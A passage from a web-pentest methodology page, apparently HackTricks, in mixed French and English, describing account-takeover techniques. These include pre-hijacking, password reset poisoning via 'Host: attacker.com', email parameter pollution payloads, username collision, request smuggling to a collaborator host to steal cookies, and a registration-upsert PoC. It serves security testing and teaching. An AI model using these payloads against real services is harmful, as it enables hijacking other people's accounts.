def handleResponse(req, interesting): if req.status != 401 and b’Invalid’ not in req.response: table.add(req)

</details>

- Try racing verification: soumettez le même OTP valide simultanément dans deux sessions ; parfois une session devient un compte attaquant vérifié tandis que le flux de la victime réussit aussi.
- Testez aussi Host header poisoning sur les liens de verification (same as reset poisoning below) pour leak ou compléter la verification sur un host contrôlé par l'attaquant.

<a class="content_ref" href="rate-limit-bypass.md"><span class="content_ref_label">Rate Limit Bypass</span></a>

<a class="content_ref" href="2fa-bypass.md"><span class="content_ref_label">2FA/MFA/OTP Bypass</span></a>

<a class="content_ref" href="email-injections.md"><span class="content_ref_label">Email Injections</span></a>

## Account Pre‑Hijacking Techniques (avant que la victime ne s'inscrive)

Une classe puissante de problèmes survient lorsqu’un attaquant effectue des actions sur l’email de la victime avant que celle‑ci crée son compte, puis récupère l’accès plus tard.

Key techniques to test (adaptez aux flows de la cible) :

- Classic–Federated Merge
- Attacker: registers a classic account with victim email and sets a password
- Victim: later signs up with SSO (same email)
- Insecure merges may leave both parties logged in or resurrect the attacker’s access
- Unexpired Session Identifier
- Attacker: creates account and holds a long‑lived session (don’t log out)
- Victim: recovers/sets password and uses the account
- Test if old sessions stay valid after reset or MFA enablement
- Trojan Identifier
- Attacker: adds a secondary identifier to the pre‑created account (phone, additional email, or links attacker’s IdP)
- Victim: resets password; attacker later uses the trojan identifier to reset/login
- Unexpired Email Change
- Attacker: initiates email‑change to attacker mail and withholds confirmation
- Victim: recovers the account and starts using it
- Attacker: later completes the pending email‑change to steal the account
- Non‑Verifying IdP
- Attacker: uses an IdP that does not verify email ownership to assert `victim@…`
- Victim: signs up via classic route
- Service merges on email without checking `email_verified` or performing local verification

Conseils pratiques

- Récupérez les flux et les endpoints depuis les bundles web/mobile. Cherchez classic signup, SSO linking, email/phone change et les endpoints de password reset.
- Créez une automation réaliste pour maintenir des sessions actives pendant que vous testez d’autres flows.
- Pour les tests SSO, déployez un IdP OIDC de test et émettez des tokens avec des claims `email` pour l’adresse de la victime et `email_verified=false` pour vérifier si le RP fait confiance à des IdP non vérifiés.
- Après tout password reset ou changement d’email, vérifiez que :
  - toutes les autres sessions et tokens sont invalidés,
  - les opérations de changement d’email/phone en attente sont annulées,
  - les IdPs/emails/phones précédemment liés sont revérifiés.

Remarque : Une méthodologie étendue et des études de cas de ces techniques sont documentées par les recherches de Microsoft sur le pre‑hijacking (voir References à la fin).

<a class="content_ref" href="reset-password.md"><span class="content_ref_label">Reset/Forgotten Password Bypass</span></a>

<a class="content_ref" href="race-condition.md"><span class="content_ref_label">Race Condition</span></a>

## **Password Reset Takeover**

### Password Reset Token Leak Via Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>

1. Request password reset to your email address
2. Click on the password reset link
3. Don’t change password
4. Click any 3rd party websites(eg: Facebook, twitter)
5. Intercept the request in Burp Suite proxy
6. Vérifiez si le referer header leak le token de password reset.

### Password Reset Poisoning <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>

1. Intercept the password reset request in Burp Suite
2. Add or edit the following headers in Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Forward the request with the modified header\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. Look for a password reset URL based on the _host header_ like : `https://attacker.com/reset-password.php?token=TOKEN`

### Password Reset Via Email Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```bash
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

IDOR sur les paramètres API

1. L’attaquant doit se connecter avec son compte et aller à la fonctionnalité Changer le mot de passe.
2. Démarrer Burp Suite et intercepter la requête
3. Envoyer vers l’onglet Repeater et modifier les paramètres : User ID/email
   powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})

Token de réinitialisation de mot de passe faible

Le token de réinitialisation devrait être généré aléatoirement et unique à chaque fois.
Essayer de déterminer si le token expire ou s’il est toujours le même ; dans certains cas l’algorithme de génération est faible et peut être deviné. Les variables suivantes peuvent être utilisées par l’algorithme.

• Horodatage
• UserID
• Email de l’utilisateur
• Prénom et nom
• Date de naissance
• Cryptographie
• Seulement des chiffres
• Séquence de token courte ( characters between [A-Z,a-z,0-9])
• Réutilisation du token
• Date d’expiration du token

Leaking Token de réinitialisation de mot de passe

1. Déclencher une demande de réinitialisation de mot de passe via l’API/UI pour un email spécifique, par ex : test@mail.com
2. Inspecter la réponse du serveur et vérifier resetToken
3. Puis utiliser le token dans une URL comme https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]

Réinitialisation de mot de passe via collision de nom d’utilisateur

1. S’enregistrer sur le système avec un nom d’utilisateur identique à celui de la victime, mais en insérant des espaces avant et/ou après le nom d’utilisateur. ex : "admin "
2. Demander une réinitialisation de mot de passe avec votre nom d’utilisateur malveillant.
3. Utiliser le token envoyé à votre email et réinitialiser le mot de passe de la victime.
4. Se connecter au compte victime avec le nouveau mot de passe.

La plateforme CTFd était vulnérable à cette attaque.
See: CVE-2020-7245

Prise de contrôle de compte via Cross Site Scripting

1. Trouver un XSS dans l’application ou un sous-domaine si la portée des cookies est le domaine parent : *.domain.com
2. Leak the current sessions cookie
3. S’authentifier en tant qu’utilisateur en utilisant le cookie

Prise de contrôle de compte via HTTP Request Smuggling

1. Utiliser smuggler pour détecter le type de HTTP Request Smuggling (CL, TE, CL.TE)
   powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h\
2. Composer une requête qui écrasera le POST / HTTP/1.1 avec les données suivantes :
   GET http://something.burpcollaborator.net HTTP/1.1 X: dans le but d’ouvrir une redirection des victimes vers burpcollab et de voler leurs cookies\
3. La requête finale pourrait ressembler à ce qui suit

GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

Hackerone rapporte l’exploitation de ce bug\

• https://hackerone.com/reports/737140\
• https://hackerone.com/reports/771666

Account Takeover via CSRF

1. Créer un payload pour le CSRF, e.g: “HTML form with auto submit for a password change”
2. Envoyer le payload

Account Takeover via JWT

JSON Web Token might be used to authenticate an user.

• Modifier le JWT avec un autre User ID / Email
• Vérifier la présence d’une signature JWT faible

JWT Vulnerabilities (Json Web Tokens)

Registration-as-Reset (Upsert on Existing Email)

Certains signup handlers effectuent un upsert lorsque l’email fourni existe déjà. Si l’endpoint accepte un body minimal contenant un email et un password et n’applique pas de vérification de propriété, l’envoi de l’email de la victime écrasera son password pre-auth.

• Discovery: récolter les endpoint names depuis le bundled JS (ou le mobile app traffic), puis fuzz les base paths comme /parents/application/v4/admin/FUZZ en utilisant ffuf/dirsearch.
• Method hints: un GET retournant des messages comme “Only POST request is allowed.” indique souvent le bon verbe et qu’un body JSON est attendu.
• Minimal body observed in the wild:

{"email":"victim@example.com","password":"New@12345"}

Exemple PoC:

POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
Host: www.target.tld
Content-Type: application/json

{"email":"victim@example.com","password":"New@12345"}

Impact : Full Account Takeover (ATO) sans aucun reset token, OTP ou vérification par e-mail.

Références

• How I Found a Critical Password Reset Bug (Registration upsert ATO)
• Microsoft MSRC – Pre‑hijacking attacks on web user accounts (May 2022)
• https://salmonsec.com/cheatsheet/account_takeover
• Hey there! You are using WhatsApp: Enumerating Three Billion Accounts for Security and Privacy (NDSS 2026 paper & dataset)

Tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE) Apprenez et pratiquez le hacking Azure : HackTricks Training Azure Red Team Expert (AzRTE)

Soutenir HackTricks

• Vérifiez les plans d’abonnement !
• Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez-nous sur Twitter 🐦 @hacktricks_live.
• Partagez des astuces de hacking en soumettant des PR au HackTricks et HackTricks Cloud dépôts github.